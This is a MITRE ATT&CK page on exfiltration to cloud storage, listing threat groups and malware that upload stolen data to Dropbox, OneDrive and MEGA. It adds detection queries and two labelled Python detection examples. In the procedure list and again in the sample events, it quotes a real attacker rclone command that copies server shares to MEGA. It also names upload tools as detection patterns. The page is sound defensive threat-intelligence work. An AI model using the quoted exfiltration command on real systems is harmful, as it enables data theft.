Exfiltration Over Web Service: Exfiltration to Cloud Storage, Sub-technique T1567.002 - Enterprise | MITRE ATT&CK®
Currently viewing ATT&CK v17.1, which was live between April 22, 2025 and October 27, 2025.
Exfiltration Over Web Service: Exfiltration to Cloud Storage
Other sub-techniques of Exfiltration Over Web Service (4)
ID | Name
T1567.001 | Exfiltration to Code Repository
T1567.002 | Exfiltration to Cloud Storage
T1567.003 | Exfiltration to Text Storage Sites
T1567.004 | Exfiltration Over Webhook
Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, editing, and retrieval of data from a remote cloud storage server over the Internet.
Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service.
ID: T1567.002
Sub-technique of: T1567
Tactic: Exfiltration
Platforms: ESXi, Linux, Windows, macOS
Version: 1.3
Created: 09 March 2020
Last Modified: 15 April 2025
Procedure Examples
ID | Name | Description
G1024 | Akira | Akira will exfiltrate victim data using applications such as Rclone. [1]
C0040 | APT41 DUST | APT41 DUST exfiltrated collected information to OneDrive. [2]
S0635 | BoomBox | BoomBox can upload data to dedicated per-victim folders in Dropbox. [3]
S0651 | BoxCaon | BoxCaon has the capability to download folders' contents on the system and upload the results back to its Dropbox drive. [4]
C0015 | C0015 | During C0015, the threat actors exfiltrated files and sensitive data to the MEGA cloud storage site using the Rclone command: rclone.exe copy --max-age 2y "\\SERVER\Shares" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M [5]
G0114 | Chimera | Chimera has exfiltrated stolen data to OneDrive accounts. [6]
G1021 | Cinnamon Tempest | Cinnamon Tempest has uploaded captured keystroke logs to the Alibaba Cloud Object Storage Service, Aliyun OSS. [7]
S0660 | Clambling | Clambling can send files from a victim's machine to Dropbox. [8][9]
G0142 | Confucius | Confucius has exfiltrated victim data to cloud storage service accounts. [10]
S1023 | CreepyDrive | CreepyDrive can use cloud services including OneDrive for data exfiltration. [11]
S0538 | Crutch | Crutch has exfiltrated stolen data to Dropbox. [12]
G1006 | Earth Lusca | Earth Lusca has used the megacmd tool to upload stolen files from a victim network to MEGA. [13]
G1003 | Ember Bear | Ember Bear has used tools such as Rclone to exfiltrate information from victim environments to cloud storage such as mega.nz. [14]
S0363 | Empire | Empire can use Dropbox for data exfiltration. [15]
G0046 | FIN7 | FIN7 has exfiltrated stolen data to the MEGA file sharing site. [16]
G0125 | HAFNIUM | HAFNIUM has exfiltrated data to file sharing sites, including MEGA. [17]
S0037 | HAMMERTOSS | HAMMERTOSS exfiltrates data by uploading it to accounts created by the actors on Web cloud storage providers for the adversaries to retrieve later. [18]
G1001 | HEXANE | HEXANE has used cloud services, including OneDrive, for data exfiltration. [11]
G0119 | Indrik Spider | Indrik Spider has exfiltrated data using Rclone or MEGASync prior to deploying ransomware. [19]
G0094 | Kimsuky | Kimsuky has exfiltrated stolen files and data to actor-controlled Blogspot accounts. [20]
G0065 | Leviathan | Leviathan has used an uploader known as LUNCHMONEY that can exfiltrate files to Dropbox. [21][22]
G1014 | LuminousMoth | LuminousMoth has exfiltrated data to Google Drive. [23]
S0340 | Octopus | Octopus has exfiltrated data to file sharing sites. [24]
S1170 | ODAgent | ODAgent can use an attacker-controlled OneDrive account for exfiltration. [25]
S1172 | OilBooster | OilBooster can exfiltrate files to an actor-controlled OneDrive account via the Microsoft Graph API. [25]
C0022 | Operation Dream Job | During Operation Dream Job, Lazarus Group used a custom build of open-source command-line dbxcli to exfiltrate stolen data to Dropbox. [26][27]
S1102 | Pcexter | Pcexter can upload stolen files to OneDrive storage accounts via HTTP POST. [28]
G1005 | POLONIUM | POLONIUM has exfiltrated stolen data to POLONIUM-owned OneDrive and Dropbox accounts. [11]
S0629 | RainyDay | RainyDay can use a file exfiltration tool to upload specific files to Dropbox. [29]
S1040 | Rclone | Rclone can exfiltrate data to cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA. [30][5]
S0240 | ROKRAT | ROKRAT can send collected data to cloud storage services such as PCloud. [31][32]
G1015 | Scattered Spider | Scattered Spider has exfiltrated victim data to the MEGA file sharing site. [33][34]
G0027 | Threat Group-3390 | Threat Group-3390 has exfiltrated stolen data to Dropbox. [8]
G1022 | ToddyCat | ToddyCat has used a DropBox uploader to exfiltrate stolen files. [28]
G0010 | Turla | Turla has used WebDAV to upload stolen USB files to a cloud drive. [35] Turla has also exfiltrated stolen files to OneDrive and 4shared. [36]
G0102 | Wizard Spider | Wizard Spider has exfiltrated stolen victim data to various cloud storage providers. [37]
G0128 | ZIRCONIUM | ZIRCONIUM has exfiltrated stolen data to Dropbox. [38]
Mitigations
ID | Mitigation | Description
M1021 | Restrict Web-Based Content | Web proxies can be used to enforce an external network communication policy that prevents use of unauthorized external services.
Detection
ID | Data Source | Data Component | Detects
DS0017 | Command | Command Execution | Monitor for execution of cloud storage CLI tools (rclone, gdrive, aws s3 cp, azcopy, gsutil), use of PowerShell, Bash, or Python scripts to upload files to cloud storage, or attempts to obfuscate file uploads via scripting (e.g., Base64 encoding before upload).
Analytic 1 - Detecting File Upload to Cloud Storage via CLI Tools
  (EventCode=1 OR source="/var/log/audit/audit.log" type="execve")
  | where (command IN ("rclone copy", "aws s3 cp", "gsutil cp", "azcopy copy", "curl -T", "wget --post-file"))
  | eval risk_score=case(command IN ("rclone copy", "aws s3 cp"), 9, command IN ("curl -T", "wget --post-file"), 8)
  | where risk_score >= 8
  | stats count by _time, host, user, command, risk_score
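The Command Execution analytic above is written as a search-language sketch. The following is an added example (not MITRE's code, and not part of the ATT&CK page) that applies the same rule to process-execution events in Python so it can be tested offline: each known upload command is matched as a pattern on the full command line rather than an exact string, so flags placed between tokens and a Windows `rclone.exe` still hit; events are scored with the page's values (9 for rclone/aws, 8 for curl/wget) and filtered at risk_score >= 8. Two assumptions are made and marked in the code: the page's case() leaves `gsutil cp` and `azcopy copy` unscored (so they would drop out of its own filter), and this example scores them 8; and the rclone pattern is widened beyond the page's `rclone copy` to the other transfer verbs (`sync`, `move`, `copyto`). The event records, host names and user names are constructed sample data.

```python
"""Added example: score process-execution events for cloud-storage CLI uploads.

Follows the Command Execution analytic on the ATT&CK page (not MITRE's code).
Event records below are constructed; field names are this example's own.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class ExecEvent:
    time: str
    host: str
    user: str
    command: str  # full command line as logged (Sysmon EventCode=1 / auditd execve)


# (pattern, rule label from the page's analytic, risk score).
# Patterns are case-sensitive; normalise case upstream if your logs need it.
UPLOAD_RULES: List[Tuple[re.Pattern, str, int]] = [
    # Widened beyond the page's "rclone copy" to rclone's other transfer verbs
    # (assumption of this example).
    (re.compile(r"\brclone(\.exe)?\b.*\b(copy|copyto|sync|move)\b"), "rclone copy", 9),
    (re.compile(r"\baws(\.exe)?\s+s3\s+cp\b"), "aws s3 cp", 9),
    (re.compile(r"\bcurl(\.exe)?\b.*(\s-T\s|--upload-file\b)"), "curl -T", 8),
    (re.compile(r"\bwget(\.exe)?\b.*--post-file\b"), "wget --post-file", 8),
    # The page's case() assigns these no score; 8 is this example's assumption.
    (re.compile(r"\bgsutil\b.*\bcp\b"), "gsutil cp", 8),
    (re.compile(r"\bazcopy(\.exe)?\b.*\b(copy|cp)\b"), "azcopy copy", 8),
]

# Constructed sample events (not real logs).
SAMPLE_EVENTS: List[ExecEvent] = [
    ExecEvent("2025-05-01T02:14:03Z", "FS01", "svc_backup",
              'rclone.exe copy --max-age 2y "\\\\SERVER\\Shares" Mega:DATA -q --transfers 7'),
    ExecEvent("2025-05-01T02:15:10Z", "WS22", "jdoe",
              "aws s3 cp ./q1-report.xlsx s3://sales-archive/"),
    ExecEvent("2025-05-01T02:16:41Z", "WS22", "jdoe",
              "curl -T customers.zip https://files.example.test/upload"),
    ExecEvent("2025-05-01T02:17:00Z", "WS09", "alice",
              "gsutil cp notes.txt gs://team-bucket/"),
    ExecEvent("2025-05-01T02:18:22Z", "WS09", "alice", "ls -la /tmp"),
    ExecEvent("2025-05-01T02:19:05Z", "DEV03", "bob", "rclone listremotes"),
]


def score_command(command: str) -> Optional[Tuple[str, int]]:
    """Return (rule label, risk score) for the first matching rule, else None."""
    for pattern, label, score in UPLOAD_RULES:
        if pattern.search(command):
            return label, score
    return None


def detect_cloud_uploads(events: List[ExecEvent], min_score: int = 8) -> List[Dict]:
    """Equivalent of the page's `where risk_score >= 8`: keep scored events only."""
    hits = []
    for ev in events:
        match = score_command(ev.command)
        if match is None:
            continue
        rule, score = match
        if score >= min_score:
            hits.append({"time": ev.time, "host": ev.host, "user": ev.user,
                         "command": ev.command, "rule": rule, "risk_score": score})
    return hits


def summarize(hits: List[Dict]) -> Dict[Tuple[str, str], int]:
    """Equivalent of `stats count by host, user`: hit counts per (host, user)."""
    counts: Dict[Tuple[str, str], int] = {}
    for h in hits:
        key = (h["host"], h["user"])
        counts[key] = counts.get(key, 0) + 1
    return counts


if __name__ == "__main__":
    for hit in detect_cloud_uploads(SAMPLE_EVENTS):
        print(f'{hit["time"]} {hit["host"]} {hit["user"]} risk={hit["risk_score"]} '
              f'rule={hit["rule"]!r} :: {hit["command"]}')
    print(summarize(detect_cloud_uploads(SAMPLE_EVENTS)))
```

On the constructed events this flags the rclone, aws, curl and gsutil executions and ignores `ls` and `rclone listremotes`; the per-(host, user) summary is where a triage queue would start, since a single user running two different upload tools in quick succession is a stronger signal than either command alone.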
DS0022 | File | File Access | Monitor for files being accessed to exfiltrate data to a cloud storage service rather than over their primary command and control channel.
Analytic 1 - Detecting File Staging Before Cloud Storage Upload
  (EventCode=11 OR EventCode=4663 OR source="/var/log/audit/audit.log" type="open")
  | where (file_path IN ("/tmp/*", "/var/tmp/*", "/home/*/Downloads/*", "C:\Users\*\Documents\exfil"))
  | eval risk_score=case(file_path LIKE "/tmp/%", 9, file_path LIKE "C:\Users\*\Documents\exfil", 8)
  | where risk_score >= 8
  | stats count by _time, host, user, file_path, risk_score
DS0029 | Network Traffic | Network Connection Creation | Monitor for unusual outbound connections to cloud storage domains, processes sending significantly more data than they receive, or high-bandwidth file transfers to cloud services.
Analytic 1 - Detecting Large Data Transfers to Cloud Storage
  (EventCode=3 OR source="zeek_conn.log" OR source="firewall_logs")
  | where (dest_ip IN (known_cloud_services) AND bytes_out > 5000000)
  | stats count, sum(bytes_out) as total_bytes by _time, host, process, dest_ip
  | where total_bytes > 50000000
  | eval risk_score=case(total_bytes > 100000000, 9, total_bytes > 50000000, 8)
  | where risk_score >= 8
  | table host, dest_ip, total_bytes, risk_score
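The Network Connection Creation analytic above aggregates outbound volume per host, process and destination. The following added example (not MITRE's code and not part of the ATT&CK page) implements the same pipeline in Python over constructed flow records: flows to known cloud-storage destinations with bytes_out above 5,000,000 are kept, bytes_out is summed per (host, process, destination), and the total is scored 8 above 50,000,000 and 9 above 100,000,000. It also reports the out/in byte ratio that the "sending significantly more data than they receive" guidance in the Detects column calls for, which the page's query sketch does not compute. Two assumptions are marked in the code: destinations are matched by hostname suffix (standing in for the page's `known_cloud_services` IP lookup), and the suffix list and every flow record are constructed sample values.

```python
"""Added example: flag high-volume uploads to cloud-storage destinations.

Follows the Network Connection Creation analytic on the ATT&CK page (not
MITRE's code). Flow records and the destination list are constructed.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class Flow:
    host: str
    process: str
    dest: str        # destination hostname (assumption: resolved via DNS/proxy logs)
    bytes_out: int
    bytes_in: int


# Constructed placeholder for the page's known_cloud_services lookup; in
# production this comes from a proxy category feed or CTI, not a hard-coded list.
CLOUD_STORAGE_SUFFIXES = ("mega.nz", "dropbox.com", "dropboxapi.com",
                          "onedrive.live.com", "drive.google.com")

# Thresholds taken from the page's analytic.
PER_FLOW_MIN_BYTES = 5_000_000
TOTAL_ALERT_BYTES = 50_000_000
TOTAL_HIGH_BYTES = 100_000_000

# Constructed sample flows (not real traffic).
SAMPLE_FLOWS: List[Flow] = [
    Flow("FS01", "rclone.exe", "files.mega.nz", 48_000_000, 120_000),
    Flow("FS01", "rclone.exe", "files.mega.nz", 62_000_000, 95_000),
    Flow("WS22", "chrome.exe", "www.dropbox.com", 6_500_000, 3_200_000),   # one large upload, total stays < 50 MB
    Flow("WS22", "chrome.exe", "www.dropbox.com", 1_000_000, 900_000),     # below per-flow threshold
    Flow("WS09", "teams.exe", "files.example.internal", 200_000_000, 1_000_000),  # not cloud storage
    Flow("DEV03", "python3", "content.dropboxapi.com", 55_000_000, 40_000),
]


def is_cloud_storage(dest: str) -> bool:
    """Suffix match against the destination list (exact host or any subdomain)."""
    d = dest.lower().rstrip(".")
    return any(d == s or d.endswith("." + s) for s in CLOUD_STORAGE_SUFFIXES)


def detect_large_cloud_uploads(flows: List[Flow]) -> List[Dict]:
    """Filter, aggregate and score flows as the page's analytic does.

    Returns alerts sorted by total outbound bytes, highest first.
    """
    totals: Dict[tuple, List[int]] = defaultdict(lambda: [0, 0])  # key -> [out, in]
    for f in flows:
        # where dest_ip IN (known_cloud_services) AND bytes_out > 5000000
        if f.bytes_out <= PER_FLOW_MIN_BYTES or not is_cloud_storage(f.dest):
            continue
        key = (f.host, f.process, f.dest)
        totals[key][0] += f.bytes_out
        totals[key][1] += f.bytes_in

    alerts = []
    for (host, process, dest), (out_bytes, in_bytes) in totals.items():
        if out_bytes <= TOTAL_ALERT_BYTES:          # where total_bytes > 50000000
            continue
        score = 9 if out_bytes > TOTAL_HIGH_BYTES else 8
        alerts.append({
            "host": host, "process": process, "dest": dest,
            "total_bytes": out_bytes,
            # Upload-heavy asymmetry: the page's "sends more than it receives" signal.
            "out_in_ratio": round(out_bytes / max(in_bytes, 1), 1),
            "risk_score": score,
        })
    alerts.sort(key=lambda a: a["total_bytes"], reverse=True)
    return alerts


if __name__ == "__main__":
    for a in detect_large_cloud_uploads(SAMPLE_FLOWS):
        print(f'{a["host"]} {a["process"]} -> {a["dest"]}: {a["total_bytes"]:,} bytes out, '
              f'out/in ratio {a["out_in_ratio"]}, risk={a["risk_score"]}')
```

On the constructed flows the file server's rclone session (110 MB to MEGA, ratio in the hundreds) scores 9 and the scripted Dropbox API upload scores 8, while the browser's single 6.5 MB Dropbox upload never reaches the 50 MB aggregate and the large transfer to an internal host is ignored because it is not a cloud-storage destination. The per-flow 5 MB floor is worth keeping in mind when tuning: an uploader that deliberately chunks below it is invisible to this rule, which is why the out/in ratio and the Command Execution analytic are needed alongside it.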
DS0029 | Network Traffic | Network Traffic Content | Monitor and analyze traffic patterns and packet contents associated with protocols that do not follow the expected protocol standards and traffic flows (e.g. extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax or structure). Consider correlation with process monitoring and command line to detect anomalous process execution and command line arguments associated with those traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for the respective protocols).
DS0029 | Network Traffic | Network Traffic Flow | Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Monitor traffic to cloud storage services for data exfiltration.
References
[1] Secureworks. (n.d.). GOLD SAHARA. Retrieved February 20, 2024.
[2] Mike Stokkel et al. (2024, July 18). APT41 Has Arisen From the DUST. Retrieved September 16, 2024.
[3] MSTIC. (2021, May 28). Breaking down NOBELIUM's latest early-stage toolset. Retrieved August 4, 2021.
[4] CheckPoint Research. (2021, July 1). IndigoZebra APT continues to attack Central Asia with evolving tools. Retrieved September 24, 2021.
[5] DFIR Report. (2021, November 29). CONTInuing the Bazar Ransomware Story. Retrieved September 29, 2022.
[6] Jansen, W. (2021, January 12). Abusing cloud services to fly under the radar. Retrieved September 12, 2024.
[7] Biderman, O. et al. (2022, October 3). REVEALING EMPEROR DRAGONFLY: NIGHT SKY AND CHEERSCRYPT - A SINGLE RANSOMWARE GROUP. Retrieved December 6, 2023.
[8] Lunghi, D. et al. (2020, February). Uncovering DRBControl. Retrieved November 12, 2021.
[9] Chen, T. and Chen, Z. (2020, February 17). CLAMBLING - A New Backdoor Base On Dropbox. Retrieved November 12, 2021.
[10] Lunghi, D. and Horejsi, J. (2018, February 13). Deciphering Confucius: A Look at the Group's Cyberespionage Operations. Retrieved December 26, 2021.
[11] Microsoft. (2022, June 2). Exposing POLONIUM activity and infrastructure targeting Israeli organizations. Retrieved July 1, 2022.
[12] Faou, M. (2020, December 2). Turla Crutch: Keeping the "back door" open. Retrieved December 4, 2020.
[13] Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca's Operations. Retrieved July 1, 2022.
[14] US Cybersecurity & Infrastructure Security Agency et al. (2024, September 5). Russian Military Cyber Actors Target U.S. and Global Critical Infrastructure. Retrieved September 6, 2024.
[15] Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016.
[16] Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021.
[17] MSTIC. (2021, March 2). HAFNIUM targeting Exchange Servers with 0-day exploits. Retrieved March 3, 2021.
[18] FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved November 17, 2024.
[19] Mandiant Intelligence. (2022, June 2). To HADES and Back: UNC2165 Shifts to LOCKBIT to Evade Sanctions. Retrieved July 29, 2024.
[20] An, J. and Malhotra, A. (2021, November 10). North Korean attackers use malicious blogs to deliver malware to high-profile South Korean targets. Retrieved December 29, 2021.
[21] Axel F, Pierre T. (2017, October 16). Leviathan: Espionage actor spearphishes maritime and defense targets. Retrieved February 15, 2018.
[22] FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.
[23] Botezatu, B. et al. (2021, July 21). LuminousMoth - PlugX, File Exfiltration and Persistence Revisited. Retrieved October 20, 2022.
[24] Cherepanov, A. (2018, October 4). Nomadic Octopus Cyber espionage in Central Asia. Retrieved October 13, 2021.
[25] Hromcova, Z. and Burgher, A. (2023, December 14). OilRig's persistent attacks using cloud service-powered downloaders. Retrieved November 26, 2024.
[26] Breitenbacher, D. and Osis, K. (2020, June 17). OPERATION IN(TER)CEPTION: Targeted Attacks Against European Aerospace and Military Companies. Retrieved December 20, 2021.
[27] ClearSky Research Team. (2020, August 13). Operation 'Dream Job' Widespread North Korean Espionage Campaign. Retrieved December 20, 2021.
[28] Dedola, G. et al. (2023, October 12). ToddyCat: Keep calm and check logs. Retrieved January 3, 2024.
[29] Vrabie, V. (2021, April 23). NAIKON - Traces from a Military Cyber-Espionage Operation. Retrieved June 29, 2021.
[30] Nick Craig-Wood. (n.d.). Rclone syncs your files to cloud storage. Retrieved August 30, 2022.
[31] Jazi, Hossein. (2021, January 6). Retrohunting APT37: North Korean APT used VBA self decode technique to inject RokRat. Retrieved March 22, 2022.
[32] Cash, D., Grunzweig, J., Adair, S., Lancaster, T. (2021, August 25). North Korean BLUELIGHT Special: InkySquid Deploys RokRAT. Retrieved October 1, 2021.
[33] CISA. (2023, November 16). Cybersecurity Advisory: Scattered Spider (AA23-320A). Retrieved March 18, 2024.
[34] Microsoft. (2023, October 25). Octo Tempest crosses boundaries to facilitate extortion, encryption, and destruction. Retrieved March 18, 2024.
[35] Symantec DeepSight Adversary Intelligence Team. (2019, June 20). Waterbug: Espionage Group Rolls Out Brand-New Toolset in Attacks Against Governments. Retrieved July 8, 2019.
[36] Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020.
[37] Shilko, J., et al. (2021, October 7). FIN12: The Prolific Ransomware Intrusion Threat Actor That Has Aggressively Pursued Healthcare Targets. Retrieved June 15, 2023.
[38] Singh, S. and Antil, S. (2020, October 27). APT-31 Leverages COVID-19 Vaccine Theme and Abuses Legitimate Online Services. Retrieved March 24, 2021.